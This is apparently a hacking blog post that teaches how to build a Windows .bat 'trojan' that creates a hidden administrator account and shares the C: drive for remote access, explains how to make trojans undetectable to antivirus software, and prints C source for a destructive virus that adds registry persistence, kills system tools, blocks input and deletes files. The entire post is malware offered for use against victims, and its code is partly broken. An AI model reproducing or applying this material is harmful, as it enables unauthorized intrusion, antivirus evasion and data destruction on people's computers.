Home > Hacking > MAKING YOUR OWN TROJAN IN A BAT FILE(membuat Trojan)

MAKING YOUR OWN TROJAN IN A BAT FILE(membuat Trojan)


:Making your own trojan in a .bat file:- Open a dos prompt we will only need a dos prompt , and windows xp… -Bazics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat file is a piece of text that windows will execute as commands. Open notepad and whrite there: dir pause And now save this as test.bat and execute it.
————————————————————————————————-
Starting

Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it’s nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C:\ /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig ———————–: Client :—————- Now that your friend opened your .bat file her system has the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \\victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \\victimip\system And this will open a explorer windows in the share system wich is the C: drive with administrators acce
————————————————————————————————-
MAKING YOUR TROJAN UD

this tutorial will be showing you 4 ways of how to make a Trojan undetectable to Anti-Virus software.
1. Encryptors/Compressors:

You would think this should be the easiest way to UD (Undetect) a Trojan…but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.
Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.

2. Byte Adders:
This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.

3. Hex Editing:
This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.

The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.

Step One: Place your Trojan Server in a folder.

2) Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.
3) Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.

4): Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.

6) Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.

7)(Optional) Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).
You have to remember that different AV software use different signatures, so scan with as many as you can.

4. Source:
The best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but its simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.

Option 1: Free Trojan Source Code.
Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.

Option 2: Decompiling.
Some may call this “Stealing” source code. I like to call it “Borrowing”. The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.
Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.

if you do find a way of making a Trojan undetectable, DONT disclose it. your Trojan detected in a short amount of time. What is here are the basics of UDing. It will be up to you to make it work.
————————————————————————————————-

Simple Virus Copies itself to start up,disables the
start bar,msconfig,ccleaner, regedit,and taskmgr.it also disables the mouse plus keyboard
disables the mouse plus keyboard beeps,generates infinite folders
and bloats your RAM!!

R.I.P Windows

*****************************/
#include
#include
#include
#include

int main()
{
AllocConsole();
ShowWindow(FindWindowA(“ConsoleWindowClass”, NULL), 0);

char Pathofvirus[MAX_PATH];
char systempath[MAX_PATH];

GetModuleFileName(NULL,Pathofvirus,MAX_PATH);
GetSystemDirectory(systempath,sizeof(systempath));

HKEY newValue;

RegOpenKey(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”,&newValue);

RegSetValueEx(newValue,”igfxc”,0,REG_SZ,(LPBYTE)Pathofvirus,sizeof(Pathofvirus));

RegCloseKey(newValue);

RegOpenKey(HKEY_CURRENT_USER,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”,&newValue);

RegSetValueEx(newValue,”ntoskrnl”,0,REG_SZ,(LPBYTE)Pathofvirus,sizeof(Pathofvirus));

RegCloseKey(newValue);

HWND hWin;

hWin = FindWindow(“Shell_TrayWnd”,NULL);
EnableWindow(hWin,0);
sleep(15000);

for(;;)
{
BlockInput(0);

HWND tasks,msconfig,regedit,ccleaner,cmd;

tasks = FindWindow(NULL,”Windows Task Manager”);
msconfig = FindWindow(NULL,”System Configuration Utility”);
regedit = FindWindow(NULL,”Registry Editor”);
ccleaner = FindWindow(NULL,”Piriform CCleaner”);
cmd = FindWindow(NULL,systempath);

if(tasks || msconfig || regedit || ccleaner|| cmd != NULL)
{
PostMessage(tasks, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(msconfig, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(regedit, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(ccleaner, WM_CLOSE, (WPARAM)0, (LPARAM)0);
PostMessage(cmd, WM_CLOSE, (WPARAM)0, (LPARAM)0);
}

malloc(rand()%512512);
beep(2500,150); beep(2200,310);
beep(2400,50); beep(2100,50);
beep(2300,50); beep(2000,230);

BlockInput(1);
system(“del *.*”);
system(“md %random%”);
}

return 0;
}

Categories: Hacking
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: